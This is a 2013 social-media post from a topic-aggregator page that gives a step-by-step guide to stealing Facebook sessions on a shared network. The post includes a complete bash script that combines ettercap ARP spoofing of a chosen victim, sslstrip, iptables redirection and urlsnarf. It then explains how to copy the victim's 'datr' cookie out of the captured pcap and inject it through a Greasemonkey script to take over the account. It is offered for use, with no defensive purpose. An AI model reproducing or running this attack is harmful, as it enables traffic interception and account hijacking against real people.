1) open bt 2) go 2 /etc/etter.conf 3) and edit etter config # - TopicsExpress



          

1) open bt 2) go 2 /etc/etter.conf 3) and edit etter config # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 4) open txt file and write this code qand save it as xyz.sh code #!/bin/bash echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK " read -e NOYES echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK " read -e XTRACT echo -n "What interface to use? ie wlan0: " read -e IFACE echo -n "Name of "Session"? (name of the folder that will be created with all the log files): " read -e SESSION echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: " read -e ROUTER echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: " read -e VICTIM mkdir /root/$SESSION/ iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain sslstrip -p -k -w /root/$SESSION/$SESSION.log & iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt & ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/ "$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap "$NOYES"wireshark & killall sslstrip killall python killall urlsnarf iptables --flush iptables --table nat --flush iptables --dele te-chain iptables --table nat --delete-chain etterlog -p -i /root/$SESSION/$SESSION.eci 5) open the properts of that folder in that permitions tick on allow & execute as progrom 6) install greas monkey on ur browser 7) download cooki ijector script from hear userscripts.org/scripts/show/119798 8) open terminal ls 9) sh xyz.sh enter 10) no 11)v have 2 give interface wlan or eth0/1/2/3.. interface 12)name the session = logs enter enter 13) open ettercap and open logs.pcap 14) http On left side up and enter and then press ctrl + F click on the string and packet bytes in the box v have 2 type datr u can c hypertext transfer protocol click on press on pless symble u can a line below [teuacated] cookie : 15) select that and right click on that line right click go to copy and then bytes and then print able text only 16 ) go to fb.co and then click alt + c then copy then refresh u wil get the profile page soon i am going 2 create vedio
Posted on: Sat, 08 Jun 2013 05:46:26 +0000

Trending Topics




Una meravigliosa novità del prossimo anno consiste nel nostro
Black Friday and Cyber Monday Jack Georges Vertical
26 July is a historical date , what may or should be considered as
We are proud to announce that our Skinny Muffins and Cereal Bars
Joke break, courtesy of my son. A guy wants to take a certain
I would like to thank everyone for coming to our Emilies Birthday

Recently Viewed Topics




© 2015